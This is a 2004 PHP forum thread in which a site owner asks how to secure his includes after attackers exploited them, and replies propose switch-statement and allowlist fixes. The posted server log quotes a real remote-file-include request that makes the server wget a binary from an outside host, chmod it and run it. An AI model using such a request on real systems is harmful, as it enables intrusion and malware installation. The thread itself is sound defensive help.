Security help needed for includes

Posted: Sat Jul 03, 2004 9:02 am
by J Reid
Hi all,

I got an email from my hosting company saying that they had found someone using my site, and my handwritten code, to try and hack into their servers. I have only a basic understanding of what is being exploited and want some advice on how to prevent it.

Below is some of the server log that was emailed to me. Basically I need to secure my includes. Apparently this is not too difficult.

Code:

www.sharperstill.com 200.158.8.123 - - [28/Jun/2004:10:46:15 +1000] "GET /index.php?include=http://www.h4ckbr.org/php.gif?&cmd=cd%20/var/tmp;wget%20http://h4ckbr.org/bd/44464;chmod%20777%2044464;./44464 HTTP/1.1" 200 4197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Jon

Posted: Sat Jul 03, 2004 9:08 am
by feyd
you could switch to a system that doesn't use the url to pass the whole filename, or any part of the filename for the include..

Can you elaborate?

Posted: Sat Jul 03, 2004 9:40 am
by J Reid
I'm not sure what my options are......

Posted: Sat Jul 03, 2004 9:48 am
by feyd
well.. consider the "include" parameter you have as a mode identifier..

so
/index.php?include=members
could correspond to memberinfo.inc.php
and
/index.php?include=threads
could correspond to viewthreads.inc.php

you can achieve this with a switch statement:

Code:

<?php

// Treat the "include" parameter as a mode name, never as a filename.
$include = (!empty($_GET['include']) ? $_GET['include'] : '');
switch($include)
{
  case 'members':
  $include = 'inc/memberinfo.php';
  break;

  case 'threads':
  $include = 'inc/viewthreads.php';
  break;

  // Anything unrecognised gets the default page.
  default:
  $include = 'inc/mainpage.php';
  break;
}

// Only a path chosen above can ever reach include().
include $include;

?>

Posted: Sat Jul 03, 2004 9:49 am
by qads
put all the include files in 1 folder, then use a script to load all the file names into an array, or if you don't have many files, just put the names in the array yourself, then get the file name from the url, check the array to see if it exists, if so, include it, else include an error page.

OR

get the file name from the url, use the file_exists function to see if the file exists, if it does, include it, else include an error page.

OK
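Putting feyd's switch and qads's array together, here is an added example (not code from any poster in this thread) of an allowlist lookup: the ?include= value is only ever a key into a table, so the filename handed to include() is always one of the constants below. The inc/ paths and page names are assumed for illustration.

```php
<?php
// Added example, not code from any poster in this thread. It combines
// feyd's switch idea with qads's array idea: the ?include= value is used
// only as a lookup key, and the filename that reaches include() always
// comes from this table. The inc/ paths are assumed for illustration.
$pages = array(
    'members' => 'inc/memberinfo.php',
    'threads' => 'inc/viewthreads.php',
    'contact' => 'inc/contact.php',
);
$defaultPage = 'inc/mainpage.php';

/**
 * Map the requested mode to an allowed file.
 * Anything not in the table (a remote URL like the one in the log,
 * a ../ path, or a non-string value from ?include[]=x) falls back
 * to $default instead of being used as a path.
 */
function resolve_include($requested, array $pages, $default)
{
    if (!is_string($requested) || !isset($pages[$requested])) {
        return $default;
    }
    return $pages[$requested];
}

$requested = isset($_GET['include']) ? $_GET['include'] : '';
$file = resolve_include($requested, $pages, $defaultPage);

// Defence in depth: even with the allowlist, keep remote includes switched
// off in php.ini (allow_url_include=Off) so that no include() anywhere in
// the application can fetch code over HTTP.
include __DIR__ . '/' . $file;
```

Because the lookup is by key, a value such as the `include=http://...` seen in the logged request is not in the table and simply gets the default page.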

Posted: Sat Jul 03, 2004 9:53 am
by J Reid
I can kind of follow that, except I'm not sure how that doesn't use the URL to send the mode identifier.....

Posted: Sat Jul 03, 2004 9:59 am
by feyd
it does use the url, but doesn't require it. But it doesn't directly use the url in the filename to use. This separation, and the use of a default value, are the major security things this snippet does.

Posted: Sat Jul 03, 2004 3:28 pm
by John Cartwright
if your main index page has calls to subpages within itself you could do this

index.php

Code:

<?php

// Mark that we are being served through the main index page.
define("IN_SITE",true);

?>
then on each of your inner pages (e.g. members.php)

Code:

<?php

// Refuse to run unless index.php defined the constant first.
if (!defined("IN_SITE"))
{
exit("You cannot access the page directly");
}

?>

Posted: Sat Jul 03, 2004 7:46 pm
by J Reid
My main index page looks for an inclusion, and if it doesn't find one it includes a default making my true index page. If it does find one then it loads that one making a page for contacting me via email. So there are only two includes. The only other page on my site - photo.php - uses the url to pass along variables for extracting the next image from the db etc...

Jon